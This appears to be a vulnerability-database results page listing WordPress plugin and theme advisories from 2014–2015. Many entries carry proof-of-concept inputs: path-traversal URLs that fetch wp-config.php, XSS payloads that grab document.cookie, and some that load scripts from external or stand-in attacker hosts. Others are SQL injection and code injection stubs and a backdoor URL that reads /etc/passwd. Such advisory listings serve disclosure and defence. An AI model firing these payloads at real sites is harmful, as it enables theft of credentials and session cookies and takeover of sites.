
4359 matches found

wpexploit | added 2015/03/28 12:00 a.m. | 18 views

Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download

The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permissions or validate the file parameter, allowing unauthenticated users to download any file from the...

AI score: 3 | Exploits: 0 | References: 3
wpexploit | added 2015/03/27 12:00 a.m. | 10 views

Aspose Cloud eBook Generator - File Download

The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/aspose-cloud-ebook-generator/asposepostsexporterdownload.php?file=../../../wp-config.php...

AI score: 0.8 | Exploits: 0 | References: 1
wpexploit | added 2015/03/25 12:00 a.m. | 15 views

Ptengine <= 1.0.1 - Reflected Cross-Site Scripting (XSS)

The ptengine-real-time-web-analytics-and-heatmap WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...

AI score: 0.5 | Exploits: 0 | References: 1
wpexploit | added 2015/03/18 12:00 a.m. | 17 views

Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User

The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...

AI score: 1.8 | Exploits: 0 | References: 2
wpexploit | added 2015/03/16 12:00 a.m. | 16 views

MiwoFTP - File & Folder Manager <= 1.0.4 - Arbitrary File Disclosure

A hook is added to 'init' in the file 'miwoftp/miwoftp.php'. This hook is triggered whenever a user visits the front end of the site. The function specified in this hook will proceed to allow the user to download a file within the scope of the home directory of the site. Various values from the G...

AI score: 0.1 | Exploits: 0 | References: 1
wpexploit | added 2015/03/10 12:00 a.m. | 18 views

Fraction Theme < 1.1.2 - Privilege Escalation

This vulnerability allows an attacker, either authenticated or unauthenticated, to escalate privileges on the site and obtain an admin account, which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...

AI score: 2.7 | Exploits: 0 | References: 3
wpexploit | added 2015/03/02 12:00 a.m. | 26 views

Photocrati Theme 4.x.x - SQL Injection

http://www.example.com/wp-content/themes/photocrati-theme-path/ecomm-sizes.php?prodid=SQL...

CVSS: 7.5 | AI score: 1.5 | EPSS: 0.04737 | Exploits: 2 | References: 3
wpexploit | added 2015/02/22 12:00 a.m. | 10 views

Quasar Theme Rock Form Builder plugin - Privilege Escalation

The Rock Form Builder plugin 1.0 is used within the Quasar WooCommerce theme 1.9.1. Authenticated users can modify WordPress settings which can lead to full site compromise. It's unclear which exact version of the rock-form-builder fixed the issue, but it was something in between 1.0 and 2.5, so...

AI score: 7 | Exploits: 0 | References: 3
wpexploit | added 2015/02/11 12:00 a.m. | 15 views

WordPress Uninstall <= 1.1 - WordPress Deletion via CSRF

Any registered user can delete all WordPress database tables and files. This request makes it possible: http://wp.dev/wp-admin/admin-ajax.php?action=uninstall...

CVSS: 5.8 | AI score: 1.1 | EPSS: 0.0061 | Exploits: 1
wpexploit | added 2015/02/11 12:00 a.m. | 25 views

Wordpress Video Gallery <= 2.7 - SQL Injection

The contus-video-gallery WordPress plugin was affected by a SQL Injection security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=rss&type=video&vid=SQLi...

CVSS: 7.5 | AI score: 1.7 | EPSS: 0.4107 | Exploits: 4 | References: 2
wpexploit | added 2015/01/29 12:00 a.m. | 20 views

PowerPress Podcasting < 6.0.1 - Cross-Site Scripting (XSS)

The PowerPress Podcasting plugin by Blubrry WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability. /wp-admin/admin.php?page=powerpress/powerpressadmincategoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--alert0x014068...

CVSS: 4.3 | AI score: 1 | EPSS: 0.02237 | Exploits: 3 | References: 1
wpexploit | added 2015/01/29 12:00 a.m. | 14 views

WPtouch <= 3.6.6 - Unvalidated Open Redirect

The WPtouch WordPress plugin was affected by an Unvalidated Open Redirect security vulnerability. http://www.example.com/?wptouchswitch=mobile&redirect=http%3A%2F%2Fdomain.com...

AI score: 1.1 | Exploits: 0 | References: 1
wpexploit | added 2015/01/28 12:00 a.m. | 34 views

Photo Gallery <= 1.2.8 - Multiple Authenticated Reflected XSS

The Photo Gallery by 10Web – Mobile-Friendly Image Gallery WordPress plugin was affected by a Multiple Authenticated Reflected XSS security vulnerability. /wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg,jpeg,png,gif&callback=bwgaddpreviewimage&sortby=name";alert1...

CVSS: 3.5 | AI score: 1.8 | EPSS: 0.02331 | Exploits: 4 | References: 1
wpexploit | added 2015/01/15 6:03 p.m. | 9 views

Feedweb 2.4.1-3.0.6 - SQL Injection

The feedweb WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/feedweb/widgetcontainer.php?pid= Inject here &ishp=true...

AI score: 1.8 | Exploits: 0 | References: 1
wpexploit | added 2015/01/15 10:08 a.m. | 9 views

GI-Media Library <= 2.2.2 - Arbitrary File Download

The gi-media-library WordPress plugin was affected by an Arbitrary File Download security vulnerability. /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== Where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64 encoded...

AI score: 2.4 | Exploits: 0 | References: 2
wpexploit | added 2014/12/27 12:00 a.m. | 11 views

Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)

The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/?pageid=0&&errorsfu-disallowed-mime-type0name=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E...

CVSS: 4.3 | AI score: 0.9 | EPSS: 0.06701 | Exploits: 2 | References: 1
wpexploit | added 2014/12/15 12:00 a.m. | 10 views

SEO Redirection < 2.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

The plugin did not sanitise the referer link from requests before displaying it in the 'Settings > SEO Redirection > Redirection History' page. This results in a Stored Cross-Site Scripting (XSS) issue. This cURL request to a redirected page with a custom referer makes it possible: curl -H 'Referer:...

AI score: 6.4 | Exploits: 0
wpexploit | added 2014/12/07 12:00 a.m. | 21 views

ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)

The vulnerability is caused by improper filtering of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php...

AI score: 0.8 | Exploits: 0 | References: 2
wpexploit | added 2014/12/02 12:00 a.m. | 11 views

Wordpress CodeArt Google MP3 Player - File Disclosure

The google-mp3-audio-player WordPress plugin was affected by a File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/google-mp3-audio-player/directdownload.php?file=../../../wp-config.php...

AI score: 0.9 | Exploits: 0 | References: 1
wpexploit | added 2014/11/20 7:52 p.m. | 37 views

WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

" onmouseover="alert'hello';"...

CVSS: 4.3 | AI score: 1 | EPSS: 0.04978 | Exploits: 1 | References: 3
wpexploit | added 2014/11/20 12:00 a.m. | 29 views

CM Download Manager <= 2.0.0 - Unauthenticated Code Injection

The plugin does not validate and sanitise the CMDsearch parameter, which is used to create a custom function. This allows an attacker to run arbitrary commands on the remote server. GET /cmdownloads/?CMDsearch=".phpinfo." HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Windows NT 6.3; WOW64; rv:33.0...

CVSS: 10 | AI score: 2.3 | EPSS: 0.14804 | Exploits: 6 | References: 3
wpexploit | added 2014/09/29 12:00 a.m. | 13 views

Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal

v0.9.2 added a check to disallow direct access to the affected file; however, the path traversal was not fixed. The plugin has been closed in the repository. Choose File to upload: Directory:...

AI score: 7.2 | Exploits: 0 | References: 1
wpexploit | added 2014/09/28 12:00 a.m. | 10 views

NativeChurch Theme - Arbitrary File Download

The NativeChurch WordPress theme was affected by an Arbitrary File Download security vulnerability. https://example.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php...

AI score: 7.2 | Exploits: 0 | References: 3
wpexploit | added 2014/08/27 12:00 a.m. | 12 views

WordPress 3.5-3.7.1 - XML-RPC Denial of Service

...

AI score: 7.1 | Exploits: 0 | References: 3
wpexploit | added 2014/08/24 12:00 a.m. | 12 views

KenBurner Slider - Unauthenticated Arbitrary File Download

The WordPress plugin KenBurner Slider suffers from an Arbitrary File Download vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...

AI score: 6.9 | Exploits: 0 | References: 2
wpexploit | added 2014/08/01 10:58 a.m. | 10 views

wp-FileManager <= 1.3.0 - File Download

The wp-filemanager WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download...

AI score: 1.4 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 10:58 a.m. | 19 views

WordPress 2.1.1 - Command Execution Backdoor

http://www.example.com/wp-includes/feed.php?ix=phpinfo; http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd...

CVSS: 7.5 | AI score: 2.2 | EPSS: 0.27006 | Exploits: 2 | References: 3
wpexploit | added 2014/08/01 12:00 a.m. | 8 views

Real Estate by Templatic - CSRF File Upload

The realestate WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/Realestate/images/tmp/yourshell.php...

AI score: 7.4 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 12:00 a.m. | 16 views

Specialist by Templatic - CSRF File Upload

The specialist WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/specialist/images/tmp/yourshell.php...

AI score: 0.1 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 12:00 a.m. | 20 views

slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard

The SlideDeck 2 Lite Responsive Content Slider WordPress plugin was affected by an XSS in ZeroClipboard security vulnerability. /wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id="catcheif!self.aself.a=!alertdocument.cookie//&width&height...

CVSS: 4.3 | AI score: 0.8 | EPSS: 0.06316 | Exploits: 4 | References: 2
wpexploit | added 2014/08/01 12:00 a.m. | 12 views

BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)

The plugin does not sanitise the view and cattitle POST parameters when creating or editing a category at /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...

AI score: 0.8 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 12:00 a.m. | 14 views

5star by Templatic - CSRF File Upload

The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/5star/images/tmp/yourshell.php...

AI score: 7.4 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 12:00 a.m. | 16 views

BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections

The plugin did not use prepared statements with the categoryid and pdfid parameters when viewing the /wp-admin/admin.php?page=bsk-pdf-manager and /wp-admin/admin.php?page=bsk-pdf-manager-pdfs pages, leading to Authenticated SQL Injection issues...

CVSS: 6.5 | AI score: 2.2 | EPSS: 0.03553 | Exploits: 3 | References: 2
wpexploit | added 2014/08/01 12:00 a.m. | 11 views

Dailydeal by Templatic - CSRF File Upload

The dailydeal WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/dailydeal/images/tmp/yourshell.php...

AI score: 0.1 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 12:00 a.m. | 11 views

Nightlife by Templatic - CSRF File Upload

The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/nightlife/images/tmp/yourshell.php...

AI score: 7.5 | Exploits: 0 | References: 1
wpexploit | added 2014/08/01 12:00 a.m. | 14 views

Video Posts Webcam Recorder < 1.55.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The Video Posts Webcam Recorder WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. https://example.com/wp-content/plugins/video-posts-webcam-recorder/posts/videowhisper/rlogout.php?message=message'//...

CVSS: 4.3 | AI score: 1.4 | EPSS: 0.01618 | Exploits: 2 | References: 2
wpexploit | added 2014/08/01 12:00 a.m. | 15 views

Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php Local File Inclusion

The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php...

AI score: 1.2 | Exploits: 0 | References: 3
wpexploit | added 2014/08/01 12:00 a.m. | 21 views

Tera Charts 0.1 - Unauthenticated Remote Path Traversal File Disclosure

The tera-charts WordPress plugin was affected by an Unauthenticated Remote Path Traversal File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php...

CVSS: 5 | AI score: 2.1 | EPSS: 0.18734 | Exploits: 2 | References: 2
wpexploit | added 2014/06/12 12:00 a.m. | 25 views

Ruven Toolkit <= 1.1 - tinymce/popup.php popup Parameter Reflected XSS

The ruven-toolkit WordPress plugin was affected by a tinymce/popup.php popup Parameter Reflected XSS security vulnerability. http://localhost/wp-content/plugins/ruven-toolkit/tinymce/popup.php?popup=popup'alertdocument.cookie&...

CVSS: 4.3 | AI score: 1 | EPSS: 0.01163 | Exploits: 2 | References: 1
wpexploit | added 2014/05/28 12:00 a.m. | 15 views

WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS

The last time it was checked, the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?apiurl=apiurl%27%3E%3Cscript%3Ealert%284%29%3C/script%3E...

CVSS: 4.3 | AI score: 1.8 | EPSS: 0.04055 | Exploits: 2 | References: 1
wpexploit | added 2014/05/07 12:00 a.m. | 11 views

Prostore < 1.1.3 - Open Redirection

The prostore WordPress theme was affected by an Open Redirection security vulnerability. /wp-content/themes/prostore/go.php?https://example.com...

AI score: 1.3 | Exploits: 0 | References: 2
wpexploit | added 2014/04/25 12:00 a.m. | 18 views

Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked, the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...

CVSS: 4.3 | AI score: 1.9 | EPSS: 0.03983 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 34 views

Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked, the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...

CVSS: 4.3 | AI score: 1.4 | EPSS: 0.03983 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 15 views

Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS

The last time it was checked, the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpiedebug.php?url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E...

CVSS: 4.3 | AI score: 1.8 | EPSS: 0.03686 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 19 views

Podcast Channels < 0.28 - Unauthenticated Reflected XSS

The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://127.0.0.1/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...

CVSS: 4.3 | AI score: 2 | EPSS: 0.03779 | Exploits: 1 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 20 views

Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS

The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability...

CVSS: 4.3 | AI score: 2.1 | EPSS: 0.03902 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 17 views

WP Planet <= 0.1 - Unauthenticated Reflected XSS

The last time it was checked, the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp-planet/rss.class/scripts/magpiedebug.php?url=alert1...

CVSS: 4.3 | AI score: 1.1 | EPSS: 0.03884 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 18 views

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked, the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html with the payload in the test.html file controlled by the attackers...

CVSS: 4.3 | AI score: 1.1 | EPSS: 0.00939 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 20 views

Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS

The last time it was checked, the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...

CVSS: 4.3 | AI score: 1.9 | EPSS: 0.03884 | Exploits: 2 | References: 1
wpexploit | added 2014/04/25 12:00 a.m. | 19 views

WP e-Commerce Swipe <= 3.1.0 - Multiple XSS Issues

The last time it was checked, the plugin was still affected and had been closed...

CVSS: 4.3 | AI score: 1.5 | EPSS: 0.01163 | Exploits: 2 | References: 1
Total number of security vulnerabilities: 4359